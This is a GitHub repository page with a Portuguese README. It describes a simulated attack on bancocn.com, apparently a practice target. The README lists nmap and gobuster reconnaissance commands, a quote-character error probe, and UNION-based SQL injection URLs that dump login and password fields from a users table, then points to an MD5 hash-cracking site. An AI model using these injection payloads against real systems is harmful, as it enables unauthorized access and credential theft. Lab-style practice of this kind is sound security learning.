https://github.com/danielfreitassc/pentest_bancocn
https://github.com/danielfreitassc/pentest_bancocn
Last synced: 5 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/danielfreitassc/pentest_bancocn
- Owner: DanielFreitassc
- License: mit
- Created: 2024-05-13T19:47:06.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2024-05-20T21:25:36.000Z (about 2 years ago)
- Last Synced: 2024-05-20T23:12:39.872Z (about 2 years ago)
- Size: 20.5 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Simulação de ataque a um site
## Ferramentas utilizadas no ataque :
## 1) Kali Linux -> Sistema Operacional
## 2) whois
## 3) nmap
## 4) gobuster
## 5) sqlmap
# Site alvo do ataque : [LINK](http://www.bancocn.com)
# Passos para invasão
## Explorando vulnerabilidades
### 1) Network Mapper(NMAP) descobre quais portas estão abertas e quais serviços estão sendo executados nessas portas.
```json
sudo nmap bancocn.com
```
### 2) Gobuster descoberta e enumeração de diretórios em servidores web.
```json
sudo gobuster dir -u http://www.bancocn.com/ -w /usr/share/wordlists/dirb/common.txt -x php,xml,html,sql,txt -t 50
```
### 3) Vamos adicionar parametros a url para tentar quebrar a requisição adicionando um ' ao lado do parametro que é o id
```json
http://www.bancocn.com/cat.php?id=1'
```
### Assim vemos uma mensagem que indica que o site usa MariaDB como banco de dados com essa infomação iremos preparar um ataque de injeção sql
No final da url vamo adiconar alguns parametros
### Cole a url no navegador para pegar fazer uma consulta pelo campo login
```
http://www.bancocn.com/cat.php?id=-1 union select 1,2,group_concat(login) from users
```
### Cole a url no navegador para pegar fazer uma consulta pelo campo password
```
http://www.bancocn.com/cat.php?id=-1 union select 1,2,group_concat(password) from users
```
###
# Decode de hash
https://md5.gromweb.com